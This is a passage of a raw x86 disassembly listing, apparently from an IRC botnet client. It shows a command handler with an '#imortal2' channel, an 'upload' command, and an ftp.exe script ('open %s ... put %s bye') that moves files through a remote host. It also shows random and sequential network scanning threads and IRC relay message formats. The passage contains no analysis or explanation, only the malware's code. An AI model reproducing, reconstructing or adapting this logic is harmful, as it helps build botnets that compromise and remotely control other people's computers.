mov ecx, [ebp+4Ch+var_24]
push [ebp+4Ch+var_8]
add ecx, eax
mov [ebp+4Ch+var_24], ecx
call sub_41E1C0
mov ecx, [ebp+4Ch+var_24]
push [ebp+4Ch+var_10]
add ecx, eax
mov [ebp+4Ch+var_24], ecx
call sub_41E1C0
add eax, [ebp+4Ch+var_18]
mov ecx, [ebp+4Ch+var_24]
push [ebp+4Ch+var_14]
lea eax, [eax+ecx+7]
push eax
call sub_41F090
add esp, 40h
push [ebp+4Ch+arg_0]
mov [ebp+4Ch+var_18], eax
call sub_41E7AD
cmp eax, ebx
mov edi, [ebp+4Ch+var_20]
pop ecx
mov [ebp+4Ch+var_B8], eax
mov [ebp+4Ch+var_24], ebx
jle short loc_407AED
loc_407A8D: ; CODE XREF: sub_40274D+5364�j
push [ebp+4Ch+var_18]
push edi
push [ebp+4Ch+var_8]
call sub_41B24B
add esp, 0Ch
cmp eax, 1
mov [ebp+4Ch+var_20], eax
jz short loc_407AB5
cmp eax, ebx
jnz short loc_407AC0
inc [ebp+4Ch+var_24]
mov eax, [ebp+4Ch+var_24]
cmp eax, [ebp+4Ch+var_B8]
jl short loc_407A8D
jmp short loc_407AF6
; ---------------------------------------------------------------------------
loc_407AB5: ; CODE XREF: sub_40274D+5355�j
push ebx
push [ebp+4Ch+var_4]
push offset unk_42DA98
jmp short loc_407AFF
; ---------------------------------------------------------------------------
loc_407AC0: ; CODE XREF: sub_40274D+5359�j
push [ebp+4Ch+var_20]
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42DA64
push eax
call sub_41E6A6
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 20h
loc_407AED: ; CODE XREF: sub_40274D+533E�j
cmp [ebp+4Ch+var_20], ebx
jnz loc_407C7B
loc_407AF6: ; CODE XREF: sub_40274D+5366�j
push ebx
push [ebp+4Ch+var_4]
push offset unk_42DA30
loc_407AFF: ; CODE XREF: sub_40274D+5371�j
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 14h
jmp loc_407C7B
; ---------------------------------------------------------------------------
loc_407B12: ; CODE XREF: sub_40274D+4D4B�j
; sub_40274D+4D62�j ...
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_C6C], eax
mov eax, [ebp+4Ch+var_4]
push 7Fh
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_C70], eax
lea eax, [ebp+4Ch+var_D04]
push eax
call sub_41E860
push edi
call sub_41E7AD
push [ebp+4Ch+arg_0]
mov [ebp+4Ch+var_C84], eax
call sub_41E7AD
push [ebp+4Ch+var_14]
mov [ebp+4Ch+var_C80], eax
call sub_41E7AD
mov esi, [ebp+esi+4Ch+var_90]
add esp, 18h
cmp esi, ebx
mov [ebp+4Ch+var_C7C], eax
jz short loc_407B77
push esi
call sub_41E7AD
pop ecx
mov [ebp+4Ch+var_C78], eax
jmp short loc_407B7D
; ---------------------------------------------------------------------------
loc_407B77: ; CODE XREF: sub_40274D+5419�j
mov [ebp+4Ch+var_C78], ebx
loc_407B7D: ; CODE XREF: sub_40274D+5428�j
push 7Fh
push [ebp+4Ch+var_9C]
lea eax, [ebp+4Ch+var_D84]
push eax
call sub_41E860
push [ebp+4Ch+var_C7C]
mov esi, [ebp+4Ch+arg_4]
push [ebp+4Ch+var_C80]
lea eax, [ebp+4Ch+var_D04]
push eax
push [ebp+4Ch+var_C84]
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42D9E8
push eax
mov [ebp+4Ch+var_D88], esi
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 17h
push eax
call sub_40AE85
add esp, 30h
mov [ebp+4Ch+var_C74], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_D88]
push eax
push offset dword_416104
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_C74]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_407C21
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D9B0
jmp loc_4089B1
; ---------------------------------------------------------------------------
loc_407C19: ; CODE XREF: sub_40274D+54DA�j
push 32h
call ds:dword_42B014 ; Sleep
loc_407C21: ; CODE XREF: sub_40274D+54B9�j
cmp [ebp+4Ch+var_C68], ebx
jz short loc_407C19
jmp loc_4089C0
; ---------------------------------------------------------------------------
loc_407C2E: ; CODE XREF: sub_40274D+4D1D�j
; sub_40274D+4D34�j
push 0Bh
call sub_40B075
push edi
mov [ebp+4Ch+var_20], eax
call sub_41E7AD
add eax, [ebp+4Ch+var_20]
pop ecx
cmp eax, 1F4h
pop ecx
jle loc_407DF1
push [ebp+4Ch+var_20]
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42D970
push eax
call sub_41E6A6
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 20h
loc_407C7B: ; CODE XREF: sub_40274D+4FBF�j
; sub_40274D+53A3�j ...
mov esi, [ebp+esi+4Ch+var_90]
cmp esi, ebx
jz loc_402B92
push [ebp+4Ch+var_10]
push offset aUpload ; "upload"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_404979
push 4
push esi
call sub_419429
test eax, eax
pop ecx
pop ecx
jnz short loc_407CC6
push esi
push offset unk_42D948
loc_407CB2: ; CODE XREF: sub_40274D+7774�j
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41E6A6
add esp, 0Ch
jmp loc_404A5B
; ---------------------------------------------------------------------------
loc_407CC6: ; CODE XREF: sub_40274D+555D�j
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
pop ecx
call sub_41ECDE
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_41ECDE
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_41ECDE
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+4Ch+var_5200]
push edx
push eax
lea eax, [ebp+4Ch+var_2E60]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2E60]
push offset aAb ; "ab"
push eax
call sub_41E54E
add esp, 20h
cmp eax, ebx
mov [ebp+4Ch+var_B8], eax
jz loc_402B92
push esi
push [ebp+4Ch+var_14]
push [ebp+4Ch+arg_0]
push edi
push [ebp+4Ch+var_8]
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax
call sub_41ECA2
push [ebp+4Ch+var_B8]
call sub_41E24B
lea eax, [ebp+4Ch+var_2E60]
push eax
lea eax, [ebp+4Ch+var_4CF8]
push offset aSS_2 ; "-s:%s"
push eax
call sub_41E6A6
add esp, 2Ch
push ebx
push ebx
lea eax, [ebp+4Ch+var_4CF8]
push eax
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push ebx
call ds:dword_444214
test eax, eax
push [ebp+4Ch+var_8]
push esi
jz short loc_407D92
push offset unk_42D8D8
jmp short loc_407D97
; ---------------------------------------------------------------------------
loc_407D92: ; CODE XREF: sub_40274D+563C�j
push offset unk_42D8A8
loc_407D97: ; CODE XREF: sub_40274D+5643�j
call sub_41E6A6
add esp, 0Ch
cmp [ebp+4Ch+var_C], ebx
jnz short loc_407DBD
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 14h
loc_407DBD: ; CODE XREF: sub_40274D+5655�j
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_417D70
jmp short loc_407DD7
; ---------------------------------------------------------------------------
loc_407DCB: ; CODE XREF: sub_40274D+569D�j
lea eax, [ebp+4Ch+var_2E60]
push eax
call sub_41EC78
loc_407DD7: ; CODE XREF: sub_40274D+567C�j
lea eax, [ebp+4Ch+var_2E60]
push 4
push eax
call sub_419429
add esp, 0Ch
test eax, eax
jnz short loc_407DCB
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_407DF1: ; CODE XREF: sub_40274D+54FB�j
push [ebp+4Ch+var_8]
call sub_41E7AD
push edi
mov [ebp+4Ch+var_378], eax
call sub_41E7AD
push [ebp+4Ch+arg_0]
mov [ebp+4Ch+var_360], eax
call sub_41E7AD
add esp, 0Ch
cmp eax, 5
mov [ebp+4Ch+var_374], eax
jnb short loc_407E2A
push 5
pop eax
mov [ebp+4Ch+var_374], eax
loc_407E2A: ; CODE XREF: sub_40274D+56D2�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_407E37
mov [ebp+4Ch+var_374], ecx
loc_407E37: ; CODE XREF: sub_40274D+56E2�j
push [ebp+4Ch+var_14]
call sub_41E7AD
mov [ebp+4Ch+var_370], eax
mov eax, 320h
cmp [ebp+4Ch+var_370], eax
pop ecx
jbe short loc_407E59
mov [ebp+4Ch+var_370], eax
loc_407E59: ; CODE XREF: sub_40274D+5704�j
or [ebp+4Ch+var_35C], 0FFFFFFFFh
cmp ds:dword_43D880, ebx
mov [ebp+4Ch+var_24], ebx
jz short loc_407EA8
mov edi, offset dword_43D880
loc_407E70: ; CODE XREF: sub_40274D+573D�j
push [ebp+4Ch+var_8]
lea eax, [edi-28h]
push eax
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_407E8E
inc [ebp+4Ch+var_24]
add edi, 40h
cmp [edi], ebx
jnz short loc_407E70
jmp short loc_407EA8
; ---------------------------------------------------------------------------
loc_407E8E: ; CODE XREF: sub_40274D+5733�j
mov eax, [ebp+4Ch+var_24]
mov ecx, eax
shl ecx, 6
mov ecx, ds:dword_43D880[ecx]
mov [ebp+4Ch+var_378], ecx
mov [ebp+4Ch+var_35C], eax
loc_407EA8: ; CODE XREF: sub_40274D+571C�j
; sub_40274D+573F�j
cmp [ebp+4Ch+var_378], ebx
jnz short loc_407EBA
push offset unk_42D874
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_407EBA: ; CODE XREF: sub_40274D+5761�j
mov edi, [ebp+esi+4Ch+var_90]
cmp edi, ebx
mov [ebp+4Ch+var_B8], edi
jz short loc_407EF5
cmp byte ptr [edi], 23h
jz short loc_407EF5
push edi
lea eax, [ebp+4Ch+var_48C]
push 10h
push eax
call sub_41E6FE
push 78h
push edi
call sub_41EFD0
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+4Ch+var_34C], eax
jmp loc_407FD0
; ---------------------------------------------------------------------------
loc_407EF5: ; CODE XREF: sub_40274D+5776�j
; sub_40274D+577B�j
cmp [ebp+4Ch+var_907], bl
jnz short loc_407F17
cmp [ebp+4Ch+var_906], bl
jnz short loc_407F17
cmp [ebp+4Ch+var_8F6], bl
jnz short loc_407F17
push offset unk_42D840
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_407F17: ; CODE XREF: sub_40274D+57AE�j
; sub_40274D+57B6�j ...
push 10h
pop edi
lea eax, [ebp+4Ch+var_2D4]
push eax
lea eax, [ebp+4Ch+var_300]
push eax
push [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_2D4], edi
call ds:dword_444068 ; getsockname
mov al, [ebp+4Ch+var_907]
neg al
push edi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+4Ch+var_2FC], eax
push [ebp+4Ch+var_2FC]
call ds:dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+4Ch+var_48C]
push eax
call sub_41E860
add esp, 0Ch
cmp [ebp+4Ch+var_8F6], bl
jz short loc_407FCA
xor eax, eax
cmp [ebp+4Ch+var_907], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+4Ch+var_48C]
push eax
call sub_41EE50
cmp edi, ebx
pop ecx
pop ecx
mov byte ptr [ebp+4Ch+arg_0+3], bl
jle short loc_407FBE
loc_407F9C: ; CODE XREF: sub_40274D+586F�j
cmp eax, ebx
jz short loc_407FBE
mov byte ptr [eax], 78h
lea eax, [ebp+4Ch+var_48C]
push 30h
push eax
call sub_41EE50
inc byte ptr [ebp+4Ch+arg_0+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+4Ch+arg_0+3]
cmp ecx, edi
jl short loc_407F9C
loc_407FBE: ; CODE XREF: sub_40274D+584D�j
; sub_40274D+5851�j
mov [ebp+4Ch+var_34C], 1
jmp short loc_407FD0
; ---------------------------------------------------------------------------
loc_407FCA: ; CODE XREF: sub_40274D+5827�j
mov [ebp+4Ch+var_34C], ebx
loc_407FD0: ; CODE XREF: sub_40274D+57A3�j
; sub_40274D+587B�j
mov eax, [ebp+4Ch+arg_4]
push [ebp+4Ch+var_9C]
mov [ebp+4Ch+var_37C], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_354], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_350], eax
mov edi, 80h
lea eax, [ebp+4Ch+var_47C]
push edi
push eax
call sub_41E6FE
mov esi, [ebp+esi+4Ch+var_8C]
add esp, 0Ch
cmp esi, ebx
jz short loc_40801E
loc_40800B: ; CODE XREF: sub_40274D+58F4�j
push esi
loc_40800C: ; CODE XREF: sub_40274D+58DE�j
lea eax, [ebp+4Ch+var_3FC]
push edi
push eax
call sub_41E6FE
add esp, 0Ch
jmp short loc_408049
; ---------------------------------------------------------------------------
loc_40801E: ; CODE XREF: sub_40274D+58BC�j
mov eax, [ebp+4Ch+var_B8]
cmp eax, ebx
jz short loc_40802D
cmp byte ptr [eax], 23h
jnz short loc_40802D
push eax
jmp short loc_40800C
; ---------------------------------------------------------------------------
loc_40802D: ; CODE XREF: sub_40274D+58D6�j
; sub_40274D+58DB�j
push offset byte_42B633
mov esi, offset aImortal2_0 ; "#imortal2"
push esi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_40800B
mov [ebp+4Ch+var_3FC], bl
loc_408049: ; CODE XREF: sub_40274D+58CF�j
cmp [ebp+4Ch+var_34C], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_40805B
mov eax, offset aSequential ; "Sequential"
loc_40805B: ; CODE XREF: sub_40274D+5907�j
push [ebp+4Ch+var_360]
lea ecx, [ebp+4Ch+var_48C]
push [ebp+4Ch+var_370]
push [ebp+4Ch+var_374]
push [ebp+4Ch+var_378]
push ecx
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42D7D8
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 0Bh
push eax
call sub_40AE85
add esp, 2Ch
mov [ebp+4Ch+var_36C], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_48C]
push eax
push offset word_40BEFE
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_36C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_4080EC
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D7A0
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_4080E4: ; CODE XREF: sub_40274D+59A5�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4080EC: ; CODE XREF: sub_40274D+5984�j
cmp [ebp+4Ch+var_348], ebx
jz short loc_4080E4
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_4080F9: ; CODE XREF: sub_40274D+4CEF�j
; sub_40274D+4D06�j
push [ebp+4Ch+var_8]
call sub_4022BD
push edi
mov [ebp+4Ch+var_4E8], eax
call sub_41E7AD
push [ebp+4Ch+arg_0]
mov [ebp+4Ch+var_4F8], eax
call sub_41E7AD
push [ebp+4Ch+var_14]
mov [ebp+4Ch+var_4F4], eax
call sub_41E7AD
mov esi, [ebp+4Ch+arg_4]
push 7Fh
push [ebp+4Ch+var_9C]
mov [ebp+4Ch+var_4F0], eax
lea eax, [ebp+4Ch+var_578]
push eax
mov [ebp+4Ch+var_57C], esi
call sub_41E860
mov eax, [ebp+4Ch+var_C]
mov edi, [ebp+4Ch+var_4]
add esp, 1Ch
push [ebp+4Ch+var_4F4]
mov [ebp+4Ch+var_4E0], edi
push [ebp+4Ch+var_4F8]
mov [ebp+4Ch+var_4DC], eax
push [ebp+4Ch+var_4F0]
push [ebp+4Ch+var_4E8]
call ds:dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42D750
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 0Bh
push eax
call sub_40AE85
add esp, 24h
mov [ebp+4Ch+var_4EC], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_57C]
push eax
push offset dword_40C4C0
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_4EC]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_4081EE
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D710
jmp loc_40491A
; ---------------------------------------------------------------------------
loc_4081E6: ; CODE XREF: sub_40274D+5AA7�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4081EE: ; CODE XREF: sub_40274D+5A86�j
cmp [ebp+4Ch+var_4D8], ebx
jz short loc_4081E6
jmp loc_404929
; ---------------------------------------------------------------------------
loc_4081FB: ; CODE XREF: sub_40274D+4CB2�j
; sub_40274D+4CC9�j
push [ebp+4Ch+var_8]
call sub_41E7AD
imul eax, 234h
cmp ds:byte_444500[eax], bl
pop ecx
jz loc_404979
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push edi
call sub_41E1C0
push [ebp+4Ch+var_8]
mov esi, eax
call sub_41E1C0
push [ebp+4Ch+var_10]
add esi, eax
call sub_41E1C0
add eax, [ebp+4Ch+var_18]
push [ebp+4Ch+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_41F090
mov esi, eax
push esi
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42D704
push eax
call sub_41E6A6
add esp, 20h
cmp esi, ebx
jz loc_404979
push [ebp+4Ch+var_8]
call sub_41E7AD
test eax, eax
pop ecx
jle loc_404979
push [ebp+4Ch+var_8]
call sub_41E7AD
cmp eax, 400h
pop ecx
jge loc_404979
push ebx
push ebx
lea eax, [ebp+4Ch+var_2D0]
push eax
push edi
push [ebp+4Ch+var_8]
call sub_41E7AD
imul eax, 234h
pop ecx
push ds:dword_4444F4[eax]
call sub_40123B
push [ebp+4Ch+var_8]
call sub_41E7AD
imul eax, 234h
add esp, 18h
cmp byte ptr ds:dword_4442E8[eax], 73h
jnz loc_404979
push esi
push [ebp+4Ch+var_8]
call sub_41E7AD
imul eax, 234h
pop ecx
add eax, offset byte_444500
push eax
push edi
push offset aSSS_0 ; "[%s] * %s %s"
jmp loc_4083C8
; ---------------------------------------------------------------------------
loc_4082F0: ; CODE XREF: sub_40274D+4C84�j
; sub_40274D+4C9B�j
push [ebp+4Ch+var_8]
call sub_41E7AD
imul eax, 234h
cmp ds:byte_444500[eax], bl
pop ecx
jz loc_404979
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push edi
call sub_41E1C0
push [ebp+4Ch+var_8]
mov esi, eax
call sub_41E1C0
push [ebp+4Ch+var_10]
add esi, eax
call sub_41E1C0
add eax, [ebp+4Ch+var_18]
push [ebp+4Ch+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_41F090
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_404979
push [ebp+4Ch+var_8]
call sub_41E7AD
test eax, eax
pop ecx
jle loc_404979
push [ebp+4Ch+var_8]
call sub_41E7AD
cmp eax, 400h
pop ecx
jge loc_404979
push ebx
push ebx
push esi
push edi
push [ebp+4Ch+var_8]
call sub_41E7AD
imul eax, 234h
pop ecx
push ds:dword_4444F4[eax]
call sub_40123B
push [ebp+4Ch+var_8]
call sub_41E7AD
imul eax, 234h
add esp, 18h
cmp byte ptr ds:dword_4442E8[eax], 73h
jnz loc_404979
push esi
push [ebp+4Ch+var_8]
call sub_41E7AD
imul eax, 234h
pop ecx
add eax, offset byte_444500
push eax
push edi
push offset aSSS_1 ; "[%s] <%s> %s"
loc_4083C8: ; CODE XREF: sub_40274D+5B9E�j
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41E6A6
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
loc_4083EA: ; CODE XREF: sub_40274D+23E3�j
add esp, 28h
jmp loc_404979
; ---------------------------------------------------------------------------
loc_4083F2: ; CODE XREF: sub_40274D+4C56�j
; sub_40274D+4C6D�j
push [ebp+4Ch+var_8]
call ds:dword_44417C ; inet_addr
push edi
mov [ebp+4Ch+var_688], eax
call sub_41E7AD
push [ebp+4Ch+arg_0]
mov [ebp+4Ch+var_698], eax
call sub_41E7AD
mov esi, [ebp+4Ch+arg_4]
push 7Fh
push [ebp+4Ch+var_9C]
mov [ebp+4Ch+var_690], eax
lea eax, [ebp+4Ch+var_718]
push eax
mov [ebp+4Ch+var_71C], esi
call sub_41E860
mov eax, [ebp+4Ch+var_C]
mov edi, [ebp+4Ch+var_4]
add esp, 14h
push [ebp+4Ch+var_690]
mov [ebp+4Ch+var_680], edi
push [ebp+4Ch+var_698]
mov [ebp+4Ch+var_67C], eax
push [ebp+4Ch+var_688]
call ds:dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42D6A8
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 0Bh
push eax
call sub_40AE85
add esp, 20h
mov [ebp+4Ch+var_68C], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_71C]
push eax
push offset byte_40C3D3
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_68C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_4084D4
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D7A0
jmp loc_40491A
; ---------------------------------------------------------------------------
loc_4084CC: ; CODE XREF: sub_40274D+5D8D�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4084D4: ; CODE XREF: sub_40274D+5D6C�j
cmp [ebp+4Ch+var_678], ebx
jz short loc_4084CC
jmp loc_404929
; ---------------------------------------------------------------------------
loc_4084E1: ; CODE XREF: sub_40274D+4C28�j
; sub_40274D+4C3F�j
push [ebp+4Ch+var_8]
call sub_41E7AD
push 7Fh
mov [ebp+4Ch+var_1134], eax
lea eax, [ebp+4Ch+var_1238]
push edi
push eax
call sub_41E860
push [ebp+4Ch+arg_0]
call sub_41E7AD
push [ebp+4Ch+var_9C]
mov esi, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_1138], eax
lea eax, [ebp+4Ch+var_11B8]
push 80h
push eax
mov [ebp+4Ch+var_1240], esi
call sub_41E6FE
mov eax, [ebp+4Ch+var_C]
mov edi, [ebp+4Ch+var_4]
add esp, 20h
push [ebp+4Ch+var_1138]
mov [ebp+4Ch+var_1124], eax
lea eax, [ebp+4Ch+var_1238]
push eax
push [ebp+4Ch+var_1134]
mov [ebp+4Ch+var_1128], edi
push esi
call sub_4023C9
pop ecx
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42D66C
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 18h
push eax
call sub_40AE85
add esp, 24h
mov [ebp+4Ch+var_1130], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_1240]
push eax
push offset dword_41366C
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_1130]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_4085CA
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D628
jmp loc_40491A
; ---------------------------------------------------------------------------
loc_4085C2: ; CODE XREF: sub_40274D+5E83�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4085CA: ; CODE XREF: sub_40274D+5E62�j
cmp [ebp+4Ch+var_1120], ebx
jz short loc_4085C2
jmp loc_404929
; ---------------------------------------------------------------------------
loc_4085D7: ; CODE XREF: sub_40274D+4BFA�j
; sub_40274D+4C11�j
push 0FFh
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_2880]
push eax
call sub_41E860
push 0FFh
lea eax, [ebp+4Ch+var_2780]
push edi
push eax
call sub_41E860
push [ebp+4Ch+arg_0]
mov [ebp+4Ch+var_267C], ebx
call sub_41E7AD
mov [ebp+4Ch+var_2678], eax
mov eax, [ebp+esi+4Ch+var_94]
add esp, 1Ch
cmp eax, ebx
jz short loc_408630
push 10h
push ebx
push eax
call sub_41EC61
add esp, 0Ch
mov [ebp+4Ch+var_2670], eax
jmp short loc_408636
; ---------------------------------------------------------------------------
loc_408630: ; CODE XREF: sub_40274D+5ECD�j
mov [ebp+4Ch+var_2670], ebx
loc_408636: ; CODE XREF: sub_40274D+5EE1�j
mov esi, [ebp+esi+4Ch+var_90]
cmp esi, ebx
jz short loc_40864D
push esi
call sub_41E7AD
pop ecx
mov [ebp+4Ch+var_2674], eax
jmp short loc_408653
; ---------------------------------------------------------------------------
loc_40864D: ; CODE XREF: sub_40274D+5EEF�j
mov [ebp+4Ch+var_2674], ebx
loc_408653: ; CODE XREF: sub_40274D+5EFE�j
movzx eax, [ebp+4Ch+var_903]
mov esi, [ebp+4Ch+arg_4]
push 7Fh
push [ebp+4Ch+var_9C]
mov [ebp+4Ch+var_266C], eax
lea eax, [ebp+4Ch+var_2900]
push eax
mov [ebp+4Ch+var_2904], esi
call sub_41E860
mov eax, [ebp+4Ch+var_4]
push edi
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_2664], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_2668], eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42D5FC
push eax
call sub_41E6A6
push esi
lea eax, [ebp+4Ch+var_2D0]
push 1Dh
push eax
call sub_40AE85
add esp, 28h
mov [ebp+4Ch+var_2680], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_2904]
push eax
push offset dword_418F38
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_2680]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_408701
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D5BC
jmp loc_4089B1
; ---------------------------------------------------------------------------
loc_4086F9: ; CODE XREF: sub_40274D+5FBA�j
push 32h
call ds:dword_42B014 ; Sleep
loc_408701: ; CODE XREF: sub_40274D+5F99�j
cmp [ebp+4Ch+var_2660], ebx
jz short loc_4086F9
jmp loc_4089C0
; ---------------------------------------------------------------------------
loc_40870E: ; CODE XREF: sub_40274D+4BCC�j
; sub_40274D+4BE3�j
push 7Fh
pop esi
push esi
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_36AC]
push eax
call sub_41E860
push esi
lea eax, [ebp+4Ch+var_362C]
push edi
push eax
call sub_41E860
push esi
push [ebp+4Ch+arg_0]
lea eax, [ebp+4Ch+var_35AC]
push eax
call sub_41E860
push esi
push [ebp+4Ch+var_9C]
lea eax, [ebp+4Ch+var_352C]
push eax
call sub_41E860
push [ebp+4Ch+arg_0]
mov eax, [ebp+4Ch+var_4]
mov esi, [ebp+4Ch+arg_4]
push edi
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_34A8], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_34A4], eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42D580
push eax
mov [ebp+4Ch+var_36B0], esi
call sub_41E6A6
add esp, 44h
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 12h
push eax
call sub_40AE85
add esp, 0Ch
mov [ebp+4Ch+var_34AC], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_36B0]
push eax
push offset loc_417BC8
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_34AC]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_4087E5
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D548
jmp loc_4089B1
; ---------------------------------------------------------------------------
loc_4087DD: ; CODE XREF: sub_40274D+609E�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4087E5: ; CODE XREF: sub_40274D+607D�j
cmp [ebp+4Ch+var_34A0], ebx
jz short loc_4087DD
jmp loc_4089C0
; ---------------------------------------------------------------------------
loc_4087F2: ; CODE XREF: sub_40274D+4AA3�j
; sub_40274D+4ABA�j
push 7Fh
pop esi
push esi
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_3284]
push eax
call sub_41E860
push esi
lea eax, [ebp+4Ch+var_3204]
push edi
push eax
call sub_41E860
push esi
push [ebp+4Ch+arg_0]
lea eax, [ebp+4Ch+var_3184]
push eax
call sub_41E860
push esi
push [ebp+4Ch+var_9C]
lea eax, [ebp+4Ch+var_3104]
push eax
call sub_41E860
push [ebp+4Ch+arg_0]
mov eax, [ebp+4Ch+var_4]
mov esi, [ebp+4Ch+arg_4]
push edi
